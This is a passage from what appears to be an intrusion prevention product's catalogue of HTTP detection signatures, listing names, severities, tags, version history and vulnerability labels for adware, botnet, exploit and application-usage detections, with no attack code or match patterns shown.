Tags: Windows, Any Hardware, SearchAid, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Searchaid
Description:
Back to top

HTTP_CSH-Adware-Searchcentrix

About this situation: Adware Searchcentrix traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Searchcentrix, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Adware-Searchcentrix
Description:
Back to top

HTTP_CSH-Adware-Sidesearch

About this situation: Adware SideSearch traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, SideSearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Sidesearch
Description:
Back to top

HTTP_CSH-Adware-Slotch

About this situation: Adware Slotch traffict detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Slotch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Slotch
Description:
Back to top

HTTP_CSH-Adware-Tickerbar

About this situation: Adware TickerBar traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, TickerBar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Adware-Tickerbar
Description:
Back to top

HTTP_CSH-Adware-Toolbarcc

About this situation: Adware ToolbarCC traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ToolbarCC, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Toolbarcc
Description:
Back to top

HTTP_CSH-Adware-Tvmedia

About this situation: Adware TVMedia activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, TVMedia, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Tvmedia
Description:
Back to top

HTTP_CSH-Adware-Websearch

About this situation: Adware Websearch traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Websearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Adware-Websearch
Description:
Back to top

HTTP_CSH-Aldi-Bot-Traffic

About this situation: Aldi Bot traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Aldi-Bot
Description:
Back to top

HTTP_CSH-Altnet-Peer-Points-Manager

About this situation: Altnet Peer Points Manager activity detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Altnet Peer Points Manager, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: Altnet-Peer-Points-Manager
Description:
Back to top

HTTP_CSH-Altnet-Topsearch

About this situation: Altnet TopSearch activity detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Altnet TopSearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: Altnet-Topsearch
Description:
Back to top

HTTP_CSH-Android/Bgserv-Traffic

About this situation: Android/Bgserv traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Android/Bgserv-Malware
Description:
Back to top

HTTP_CSH-Apache-Activemq-File-Upload-Directorytraversal

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation ActiveMQ detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: Apache-Activemq-File-Upload-Directory-Traversal
Description:
Back to top

HTTP_CSH-Apache-Activemq-Fileserver-Move-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation ActiveMQ detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: Apache-Activemq-Fileserver-Move-Directory-Traversal
Description:
Back to top

HTTP_CSH-Apache-Byte-Range-Filter-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Apache2, CVE2005, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-354-4219
Last changed: sgpkg-ips-1476-5242
Vulnerability: Apache-Byte-Range-Filter-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-Camel-Filter-Bypass-CVE-2025-27636

About this situation: An attempt to exploit a vulnerability in Apache Camel detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Camel, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Vulnerability: Apache-Camel-Filter-Bypass-CVE-2025-27636
Description:
Back to top

HTTP_CSH-Apache-Fineract-Imagesapiresource-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Fineract detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation Fineract, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1554-5242
Vulnerability: Apache-Fineract-Imagesapiresource-Arbitrary-File-Upload
Description:
Back to top

HTTP_CSH-Apache-Host-Header-Default-Error-Page-XSS

About this situation: Detects suspicious HTTP Host header fields
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2002, Any Operating System not specific, Apache not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1641-5242
Vulnerability: HTTP-Apache-Host-Header-Default-Error-Page-XSS
Description:
Back to top

HTTP_CSH-Apache-HTTP-Server-Mod-Cache-Module-Denial-Of-Service

About this situation: Denial of service exploit against the mod_cache module in Apache HTTP Server detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Apache, CVE2007, Any Operating System not specific, Apache not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1528-5242
Vulnerability: Apache-HTTP-Server-Mod-Cache-Module-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Apache, CVE2014, Any Operating System not specific, Apache not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1644-5242
Vulnerability: Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service-2

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2014, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-HTTP-Server-Mod_Proxy-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2014, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1470-5242
Vulnerability: Apache-HTTP-Server-Mod_Proxy-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2012, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-485-5211
Last changed: sgpkg-ips-1470-5242
Vulnerability: Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-Httpd-Ap_Find_Token-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2017, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-956-5242
Last changed: sgpkg-ips-1470-5242
Vulnerability: Apache-Httpd-Ap_Find_Token-Out-Of-Bounds-Read
Description:
Back to top

HTTP_CSH-Apache-Httpd-Error-Code-400-Httponly-Cookie-Handling-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Apache HTTP Server was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2012, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-731-5211
Vulnerability: Apache-Httpd-Error-Code-400-Httponly-Cookie-Handling-Information-Disclosure
Description:
Back to top

HTTP_CSH-Apache-Httpd-Mod_Auth_Digest-Memory-Access-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation httpd detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2017, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1733-5242
Vulnerability: Apache-Httpd-Mod_Auth_Digest-Memory-Access-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache HTTP Server detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Apache, CVE2023, Any Operating System not specific, Apache not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Vulnerability: Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-Httpd-Mod_Log_Config-Cookie-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2012, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1644-5242
Vulnerability: Apache-Httpd-Mod_Log_Config-Cookie-Handling-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-Httpd-Mod_sed-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation httpd detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation httpd, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1481-5242
Last changed: sgpkg-ips-1581-5242
Vulnerability: Apache-Httpd-Mod_sed-Integer-Overflow
Description:
Back to top

HTTP_CSH-Apache-Httpd-Multiple-Mime-Headers-DoS-2

About this situation: Apache HTTPD Mime Headers DoS
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Apache, CVE1999, Any Operating System not specific, Apache not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: Apache-Httpd-Multiple-Mime-Headers-DoS
Description:
Back to top

HTTP_CSH-Apache-Httpd-Range-Header-Field-Memory-Exhaustion

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2011, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1476-5242
Vulnerability: Apache-Httpd-Range-Header-Field-Memory-Exhaustion
Description:
Back to top

HTTP_CSH-Apache-ISAPI-Module-Dangling-Pointer

About this situation: An attempt to exploit a vulnerability in Apache web server was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Apache, CVE2010, Windows not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-291-4219
Last changed: sgpkg-ips-471-5211
Vulnerability: Apache-ISAPI-Module-Dangling-Pointer
Description:
Back to top

HTTP_CSH-Apache-Ofbiz-Loadjwt-Authentication-Bypass-CVE-2024-25065

About this situation: An attempt to exploit a vulnerability in Apache OFBiz detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1704-5242
Last changed: sgpkg-ips-1704-5242
Vulnerability: Apache-Ofbiz-Loadjwt-Authentication-Bypass-CVE-2024-25065
Description:
Back to top

HTTP_CSH-Apache-Pulsar-JSON-Web-Token-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Pulsar detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation Pulsar, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Apache-Pulsar-JSON-Web-Token-Authentication-Bypass
Description:
Back to top

HTTP_CSH-Apache-Shiro-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Shiro detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Apache Shiro, CVE2016, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1784-5242
Vulnerability: Apache-Shiro-Remote-Code-Execution
Description:
Back to top

HTTP_CSH-Apache-Struts-2-Cookieinterceptor-OGNL-Script-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts 2 detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2012, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1528-5242
Vulnerability: Apache-Struts-2-Cookieinterceptor-OGNL-Script-Injection
Description:
Back to top

HTTP_CSH-Apache-Subversion-Mod_authz_SVN-Copy-Move-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Subversion detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-771-5211
Vulnerability: Apache-Subversion-Mod_authz_SVN-Copy-Move-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-Subversion-Mod_Dav_SVN-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Subversion detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-1584-5242
Vulnerability: Apache-Subversion-Mod_Dav_SVN-Integer-Overflow
Description:
Back to top

HTTP_CSH-Apache-Tika-Server-Command-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Apache Tika detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tika, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Apache-Tika-Server-Command-Injection-Vulnerability
Description:
Back to top

HTTP_CSH-Apache-Tomcat-Fileupload-Content-Type-Header-Infinite-Loop

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Commons FileUpload detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Apache-Tomcat-Fileupload-Content-Type-Header-Infinite-Loop
Description:
Back to top

HTTP_CSH-Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813

About this situation: An attempt to exploit a vulnerability in Apache Tomcat detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1851-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813
Description:
Back to top

HTTP_CSH-Apache-Tomcat-Large-Chunked-Transfer-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Tomcat detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1528-5242
Vulnerability: Apache-Tomcat-Large-Chunked-Transfer-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apache-Traffic-Server-HTTP-Range-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Traffic Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Traffic Server, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1686-5242
Vulnerability: Apache-Traffic-Server-HTTP-Range-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Apple-Aperture-Usage

About this situation: Apple Aperture usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Mac OS X, Any Hardware, Apple Aperture, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Apple-Core-Media-Usage

About this situation: Apple Core Media usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Apple iPhone, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Apple-iPhone-Maps-Usage

About this situation: Apple iPhone Maps usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Apple iPhone, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Apple-iPhoto-8.0-Usage

About this situation: Apple iPhoto '09 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Apple iPhoto, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-210-2032
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Apple-iPhoto-8.1-Usage

About this situation: Apple iPhoto '09 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Apple iPhoto, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-264-3038
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Apple-iTunes-Usage

About this situation: Apple iTunes usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Apple iTunes, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Apple-Publication-Subscription-Service-Usage

About this situation: Apple Publication Subscription Service usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Mac OS X, Any Hardware, Apple Publication Subscription Service, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Apple-Software-Update-Usage

About this situation: Apple Software Update usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Mac OS X, Any Hardware, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-AppleWebKit-Usage

About this situation: Generic AppleWebKit application usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-452-4333
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Arcserve-Unified-Data-Protection-ImportNodeServlet-Dopost-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Arcserve Unified Data Protection, CVE2024, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1710-5242
Last changed: sgpkg-ips-1712-5242
Vulnerability: Arcserve-Unified-Data-Protection-ImportNodeServlet-Dopost-Directory-Traversal
Description:
Back to top

HTTP_CSH-Ask-Jeeves-Teoma-Web-Spider

About this situation: Ask Jeeves/Teoma web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Ask Jeeves/Teoma, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Asn-1-Bitstring-Overflow-MS04-007

About this situation: Detects exploits against the Microsoft ASN.1 library via a malformed SPNEGO token in HTTP Authorization field
Context: HTTP Request Header Line
Severity: 10
Tags: Windows XP, Windows 2000, Windows 2003, Windows NT 4.0, Any Hardware, MS2004, CVE2005, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows NT 4.0 not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1398-5242
Vulnerability: Asn-1-Bitstring-Overflow-MS04-007
Description:
Back to top

HTTP_CSH-Asterisk-Management-Interface-Digest-Authentication-Stack-BOF

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-1528-5242
Vulnerability: Asterisk-Management-Interface-HTTP-Digest-Authentication-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Avast-Internet-Security-Syncer-User-Agent

About this situation: Avast Internet Security Syncer user-agent detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Avgesi.B-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Win32.Trojan.Avgesi-Botnet
Description:
Back to top

HTTP_CSH-Azureus-Client

About this situation: Azureus P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Azureus, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-BadBind.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Trojan.BadBind-Botnet
Description:
Back to top

HTTP_CSH-Badbox-Botnet-C2-Traffic

About this situation: BADBOX Botnet activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, BadBox Botnet, Any Operating System not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1816-5242
Last changed: sgpkg-ips-1817-5242
Vulnerability: Badbox-Botnet-C2-Traffic
Description:
Back to top

HTTP_CSH-Baiduspider-Web-Spider

About this situation: Baiduspider web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Baiduspider, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Bargain-Buddy-Install

About this situation: Bargain Buddy installation detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Bargain Buddy, Windows not specific, Bargain Buddy not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: Bargain-Buddy
Description:
Back to top

HTTP_CSH-Bargain-Buddy-Traffic

